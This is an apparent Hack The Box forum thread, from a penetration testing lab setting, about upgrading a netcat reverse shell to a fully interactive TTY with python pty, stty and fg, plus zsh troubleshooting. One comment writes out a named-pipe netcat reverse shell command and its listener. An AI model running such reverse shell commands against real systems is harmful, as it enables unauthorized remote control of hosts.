Obtaining a Fully Interactive Shell

edited October 2017 in Other

I have seen a lot of people ask about this yet there are not too many good online resources that explain it simply.

When obtaining a reverse shell with a Netcat listener, it is by default non-interactive and you cannot pass keyboard shortcuts or special characters such as tab.

It is quite simple to work around. For starters, in your shell, run python -c 'import pty;pty.spawn("/bin/bash");' to obtain a partially interactive bash shell.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. Once that is done, run the command fg to bring Netcat back to the foreground. Note you will not be able to see what you are typing in terminal after you change your stty setting. You should now have tab autocomplete as well as be able to use interactive commands such as su and nano.

If you want to see it in action, check out ippsec's YouTube videos, as he uses this exact method in quite a few of them: ippsec's channel

Arrexel

«1

Comments

  • edited October 2017

    guy, nicely put , i once was looking for how to nano a file though a shell not ssh... had to finally echo my code into the file on the PWK labs..

    question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

  • you wont always have python so this is a good resource to have bookmarked:
    https://netsec.ws/?p=337

    sajkox

  • @princeade said:
    guy, nicely put , i once was looking for how to nano a file though a shell not ssh... had to finally echo my code into the file on the PWK labs..

    question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

    The majority of connect back shells should work fine. I meant nc as the listening service on the local machine. Refer to the netsec.ws link that @sajkox posted to see other options.

    Arrexel

  • I've tried the above method few times, but it failed every time. I don't understand what am I doing wrong...
    After doing fg, Enter key is displayed as ^M
    Something like this:

    $ fg
                               clear^M
    

    Hack The Box Badge

  • edited October 2017

    Have a look at ippsec's video to see it in action: Joker

    Note he did /bin/sh in pty.spawn. Should have been /bin/bash

    Arrexel

  • Even I do /bin/bash every time I try...
    I've followed all his tutorials so far and I've tried to imitate it.
    No luck so far...

    Hack The Box Badge

  • What machine are you trying this on, what kind of reverse connection and what are you using for a listener?

    Arrexel

  • I tried this on Parrot OS which is debian based with mate DE.
    And the reverse connection was:

    mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe
    

    And listening with:

    nc -nvlp 4000
    

    Hack The Box Badge

  • Hmm works for me with that exact connect back method in Kali. Tested on CronOS:
    cronos rev shell

    Arrexel

  • edited October 2017

    This is what's happening at my end
    image

    I got the same output when I tried with some of the HTB machines.

    Hack The Box Badge

  • @hkh4cks it might be down to ohmyzsh I think

    sajkox

  • Great find @sajkox ! :smiley:
    That was the issue...
    Thank you guys for looking into it :)

    Hack The Box Badge

  • @hkh4cks try pressing enter a couple times after foregrounding the process

    Hack The Box

  • Nice thread guys.. My 2 coins..

    stty rows 50 cols 200

    To fix your rows/cols in your terminal. Especially useful when you do ps so you can see the full length of the process command.

    You can play also with the TERM env variable if not set already eg. export TERM=xterm

  • @PinkPanther it worked when I switched to bash from zsh.
    Nice tip @SuRGeoNix

    Hack The Box Badge

  • What about -e /bin/bash?

  • hi all
    https://mukarramkhalid.com/php-python-root-exploiter/

    you can have TTY in http shell or web based shell by providing credentials. that is usefull in case of server in droping requests on other ports etc

  • Bump, as several people have been asking about this topic recently

    Arrexel

  • Hi @hkh4cks
    how did you fix the ohmyzsh error with the netcat shell after doing fg.
    cant find anything to fix that

  • I came across this while trying to solve similar issues, might help others. There are few additional commands to what is listed in first post.

    • On the remote machine, run python -c 'import pty; pty.spawn("bash")' and press CTRL-z to put the SSH session to the background.
    • Then run stty -a to print out information about your shell. Note the rows and columns (say they are 40 and 160 respectively).
    • Now run stty raw -echo to put your shell into raw mode, then fg to get back into the SSH session, and finally reset to reset the shell. It you get asked for the type of the terminal, use xterm-256color.
    • After that, run stty rows 40 columns 160 to specify the correct size. You should now have a fully working shell, in particular vi should work.

    https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

  • edited December 2018

    That's a great thing to share, so here are my two cents:

    • Spawning bash with python:
    $ python -c 'import pty; pty.spawn("/bin/bash")'
    
    • Background'ing the remote shell with CTRL-Z:
    [email protected]:~$ ^Z
    
    • Getting ROWS and COLS within current terminal window:
    [email protected]:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
    
    • Ignoring hotkeys in the local shell and getting back to the remote:
    [email protected]:~$ stty raw -echo; fg
    
    • Setting correct size for the remote shell (where ROWS and COLS are the values from the 3rd bullet):
    [email protected]:~$ stty rows ROWS cols COLS
    
    • Adding some colors:
    [email protected]:~$ export TERM=xterm-256color
    
    • Reloading bash to apply the TERM variable:
    [email protected]:~$ exec /bin/bash
    

    :triumph:

    HTB

  • Great thread. Sexytime

    Hack The Box

  • You can also write a c program that spawns a child which is controlled by a pty. In this article you find information on how to do that:
    http://rachid.koucha.free.fr/tech_corner/pty_pdip.html

    If you want to read about what tty/pty are, take a look at this article:
    http://www.linusakesson.net/programming/tty/

  • something handy for me is setting this up in the custom commands plugin for terminator.
    i have 3 commands, one to pty.spawn bash, one to print and set stty info locally, and one to set stty on the actual rev shell. they are quick and dirty one liners but it works pretty well here are my commands:

    Terminator Custom Commands

    name: Upgrade TTY Python
    Command: python -c "import pty;pty.spawn('/bin/bash')"

    name: Fix TTY 1
    command: printf "\n\n(Rows,Cols)\n ";printf '\e[1;91m%-6s\e[m' $(stty size);printf "\n\nTerm= \e[91m$TERM\e[0m\n\n";stty raw -echo;fg;

    name: Fix TTY 2
    command: export SHELL=bash;export TERM=xterm-256color;stty rows 20 columns 100;\echo ;echo ;read -p "Enter Rows:" ROWS;read -p "Enter Cols:" COLS;stty rows $ROWS columns $COLS && clear

    once you get a reverse shell
    1. right click > custom commands > Upgrade TTY Python
    2. Press Ctrl+z to background
    3. right click > custom commands > Fix TTY 1
    4. right click > custom commands > Fix TTY 2
    5. enter the row and col values when prompted (should still be on screen from step 2, so long as no reset is used).

  • edited March 26

    For the people (@hkh4cks) who's gettin the ^M and ^? instead of ENTER and BACKSPACE after running the fg command here's the problem explanation and solution.

    Probably you're using zsh as your terminal and/or MacOS. The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. So if you read stty manual and check what the command stty raw -echo was intended to do, you'll see that after running it, your output wasn't supposed to be echoed back to your screen anymore. So if you run stty -echo and still are able to see what you're typing next, your terminal are not respecting the -echo. Reading this zsh mailing list thread (https://www.zsh.org/mla/workers/2014/msg00870.html) we can see that zsh, specifically, only respect the -echo until the next prompt. That means that you need to type your next command all in one line, just line like @snovvcrash showed in his comment:

    [email protected]:~$ stty raw -echo; fg

    If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect. This is not a zsh limitation however, au contraire, this is an intended behavior for your own safety. Zsh behave like this to prevent you from getting stuck blinded at a terminal. For you to understand what it mean, just run bash and then stty -echo. Now you have no ideia what you're typing anymore. You're blind Jost hoping you correctly type reset to get your echo back.

    Hope this help. Cheers!

  • Type your comment> @salamander said:

    For the people (@hkh4cks) who's gettin the ^M and ^? instead of ENTER and BACKSPACE after running the fg command here's the problem explanation and solution.

    Probably you're using zsh as your terminal and/or MacOS. The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. So if you read stty manual and check what the command stty raw -echo was intended to do, you'll see that after running it, your output wasn't supposed to be echoed back to your screen anymore. So if you run stty -echo and still are able to see what you're typing next, your terminal are not respecting the -echo. Reading this zsh mailing list thread (https://www.zsh.org/mla/workers/2014/msg00870.html) we can see that zsh, specifically, only respect the -echo until the next prompt. That means that you need to type your next command all in one line, just line like @snovvcrash showed in his comment:

    [email protected]:~$ stty raw -echo; fg

    If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect. This is not a zsh limitation however, au contraire, this is an intended behavior for your own safety. Zsh behave like this to prevent you from getting stuck blinded at a terminal. For you to understand what it mean, just run bash and then stty -echo. Now you have no ideia what you're typing anymore. You're blind Jost hoping you correctly type reset to get your echo back.

    Hope this help. Cheers!

    Big man coming in clutch with this. Props.


    Hack The Box
    defarbs.com - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • After fg, ctrl+z cannot background the shell ?

  • Type your comment> @BaiduFu said:

    After fg, ctrl+z cannot background the shell ?

    You did it backwards. fg stands for "foreground", meaning you'll be foregrounding the job you just "backgrounded" with CTRL+Z.


    Hack The Box
    defarbs.com - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'”

  • After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

  • edited July 20

    For the sake of variety; instead of doing the python -c ... thing, thus relying on python being available on the box, you could also do:

    script /dev/null, this will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+z ... etc and export TERM=linux, export HOME=/tmp or something similar).

    HTH!

    sx02089

Sign In to comment.